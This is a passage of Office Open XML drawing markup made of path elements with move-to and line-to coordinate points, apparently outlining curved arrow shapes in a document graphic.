                                  <a:pt x="2002028" y="2802763"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2076323" y="2761742"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2149094" y="2720340"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2219833" y="2678684"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2254504" y="2657602"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2288540" y="2636520"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2321941" y="2615438"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2354707" y="2594102"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2370569" y="2583523"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2386711" y="2572766"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2418207" y="2551303"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2478532" y="2507869"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2535682" y="2464054"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2589149" y="2419604"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2638933" y="2374646"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2684526" y="2328799"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2725801" y="2282456"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2762885" y="2235454"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2796159" y="2187702"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2825750" y="2139569"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2852039" y="2090801"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2875280" y="2041652"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2895727" y="1991995"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2913761" y="1942084"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2929382" y="1891919"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2943352" y="1841373"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2955417" y="1790700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2966212" y="1739773"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2975737" y="1688719"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2984500" y="1637665"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2988741" y="1610588"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3020187" y="1615567"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="6751320" h="5093335">
                                <a:moveTo>
                                  <a:pt x="3194177" y="806069"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3194126" y="803529"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3194037" y="799211"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3193923" y="793369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2779395" y="799211"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2643886" y="803529"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2510536" y="809879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2379980" y="818642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2252726" y="830453"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2129536" y="845820"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2010664" y="865251"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1896872" y="889127"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1842008" y="902970"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1788668" y="918210"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1736725" y="934720"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1686560" y="952754"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1638046" y="972312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1591310" y="993394"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1546225" y="1016127"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1503172" y="1040638"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1462151" y="1066927"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1423162" y="1095121"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1386205" y="1125093"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1351407" y="1157097"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1318895" y="1191133"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1288669" y="1227201"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1260475" y="1265047"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1234440" y="1304671"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1210310" y="1346200"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1188212" y="1389380"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167892" y="1434084"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1149477" y="1480312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1132713" y="1528064"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1117600" y="1577340"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1104138" y="1627886"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1091946" y="1679829"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1072134" y="1787271"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1057376" y="1898332"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1046988" y="2014982"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1040638" y="2134362"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1037717" y="2256790"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1037717" y="2381631"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1039863" y="2507869"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1043673" y="2636139"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1051090" y="2817495"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1051166" y="2819349"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1019429" y="2820670"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1060577" y="2895219"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1089088" y="2831973"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1095629" y="2817495"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1063866" y="2818828"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1056398" y="2636520"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1052449" y="2508377"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1050417" y="2381631"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1050417" y="2256790"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1053325" y="2135213"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1059688" y="2015998"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1069848" y="1900694"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1084580" y="1789442"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1104163" y="1683588"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1116457" y="1631061"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1129284" y="1582686"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1144143" y="1534058"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1161288" y="1484896"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1179588" y="1439176"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1199642" y="1394968"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1221346" y="1352473"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1244930" y="1311808"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1270977" y="1272133"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1298448" y="1235240"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1328127" y="1199857"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1328420" y="1199540"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1328331" y="1199718"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1328597" y="1199451"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1360170" y="1166368"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1394142" y="1135024"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1430883" y="1105128"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1468234" y="1078166"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1469047" y="1077683"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1469174" y="1077582"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1469034" y="1077645"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1469428" y="1077417"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1508379" y="1052410"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1509585" y="1051750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1552219" y="1027430"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1596644" y="1004951"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1642643" y="984097"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1691005" y="964692"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1740789" y="946785"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1793443" y="930059"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1845310" y="915289"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1898103" y="901877"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2011222" y="878090"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2012772" y="877849"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2130996" y="858443"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2130869" y="858443"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2251075" y="843432"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2380869" y="831342"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2511171" y="822579"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2644394" y="816102"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2779776" y="811911"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2916936" y="809129"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3194177" y="806069"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="6751320" h="5093335">
                                <a:moveTo>
                                  <a:pt x="3440938" y="133731"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3435794" y="131572"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3362325" y="100711"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3364382" y="131572"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3364433" y="132435"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2566416" y="191643"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2355215" y="211963"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2148967" y="235077"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2047875" y="247777"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1948561" y="261620"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1850898" y="276225"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1755140" y="292100"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1661160" y="308864"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1569466" y="327025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1479804" y="346329"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1392555" y="367030"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1307719" y="389128"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1225550" y="412623"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1145921" y="437896"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1069340" y="464566"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="995553" y="493014"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="924814" y="523367"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="857377" y="555371"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="793115" y="589407"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="732409" y="625475"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="675132" y="663448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="621665" y="703707"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="571881" y="746125"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="526034" y="790829"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="484124" y="837692"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="445897" y="886841"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="411226" y="937895"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="379984" y="990854"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="352171" y="1045972"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="327660" y="1102614"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="306197" y="1161161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="287655" y="1221359"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="272034" y="1283081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="259207" y="1346454"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="248793" y="1411351"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="241046" y="1477518"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="235585" y="1544955"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="232283" y="1613662"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="231140" y="1683766"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="232016" y="1753997"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="234645" y="1825498"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="239077" y="1898777"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="245008" y="1972437"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="261493" y="2123948"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="282702" y="2276995"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="307975" y="2432177"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="336169" y="2589149"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="366268" y="2747010"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="397510" y="2905633"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="409956" y="2903093"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="378841" y="2744724"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="348742" y="2586863"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="320548" y="2430018"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="295275" y="2275078"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="274066" y="2122424"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="257924" y="1973580"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="251904" y="1899666"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247434" y="1826641"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="244741" y="1754505"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="243840" y="1683766"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="244970" y="1614309"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="248119" y="1546174"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="253746" y="1478788"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="261251" y="1413802"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="271462" y="1349806"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="271653" y="1348943"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="271691" y="1348625"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="284365" y="1286141"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="299847" y="1224940"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="318135" y="1165377"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="339369" y="1107795"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="363601" y="1051496"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="391058" y="997204"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="391147" y="997013"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="421982" y="944562"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="456285" y="894181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="493522" y="846455"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="494017" y="845705"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="501256" y="837692"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="535368" y="799541"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="580605" y="755357"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="629450" y="713740"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="629577" y="713613"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="682612" y="673747"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="738987" y="636308"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="739584" y="635927"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="797610" y="601433"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="799122" y="600633"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="862977" y="566801"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="930021" y="534924"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="999820" y="504990"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1073327" y="476592"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1073556" y="476592"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1075778" y="475742"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1148626" y="450354"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1149794" y="449999"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1229233" y="424815"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1311021" y="401320"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1395603" y="379349"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1482598" y="358775"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1571879" y="339471"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1663446" y="321310"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1757172" y="304546"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1852803" y="288798"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1950339" y="274193"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2049526" y="260477"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2149487" y="247777"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2149348" y="247777"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2356485" y="224663"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2567559" y="204343"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3000502" y="169926"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3365284" y="145110"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3364661" y="135851"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3365233" y="144272"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3365284" y="145110"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3367405" y="176784"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3440938" y="133731"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="6751320" h="5093335">
                                <a:moveTo>
                                  <a:pt x="3474707" y="2024253"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3474466" y="1992503"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3473348" y="1961210"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3473323" y="1960372"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3471456" y="1929003"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3471418" y="1928241"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3468840" y="1897126"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3468751" y="1895983"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3465690" y="1864995"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3465576" y="1863725"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3452622" y="1766570"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3442081" y="1701546"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3430397" y="1636395"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3418332" y="1571244"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3405886" y="1573530"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3417951" y="1638681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3429508" y="1703578"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3440049" y="1768475"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3449066" y="1832991"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3452876" y="1864995"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3456051" y="1895983"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3456178" y="1897126"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3458654" y="1928241"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3458718" y="1929003"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3460585" y="1960372"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3460623" y="1961210"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3461753" y="1992249"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3462007" y="2024253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3461512" y="2055368"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3460013" y="2086279"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3457346" y="2117750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3457410" y="2117991"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3453765" y="2148586"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3449142" y="2178126"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3443020" y="2209850"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3443020" y="2210079"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3427323" y="2270125"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3406775" y="2327922"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3393160" y="2359152"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3393046" y="2359431"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3362820" y="2417000"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3325749" y="2473668"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3303625" y="2502941"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3303282" y="2503398"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3280016" y="2531046"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3255124" y="2558288"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3227844" y="2585491"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3227743" y="2585656"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3169716" y="2637548"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3134360" y="2665857"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3100247" y="2691663"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3062986" y="2718181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3024632" y="2744089"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2984881" y="2769616"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2943479" y="2794889"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2900553" y="2820035"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2861551" y="2842120"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2861386" y="2842209"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2807068" y="2871622"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2758541" y="2896933"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2715768" y="2918714"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2666492" y="2942844"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2616200" y="2966847"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2564892" y="2990723"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2512568" y="3014472"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2459228" y="3038094"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2350389" y="3084957"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2238629" y="3131439"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2059774" y="3203384"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1786102" y="3309874"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1774698" y="3280283"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1717294" y="3343275"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1802130" y="3351403"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1792478" y="3326384"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1790687" y="3321774"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2071624" y="3212338"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2243455" y="3143250"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2355342" y="3096768"/>
                                </a:lnTo>
                                <a:lnTo>
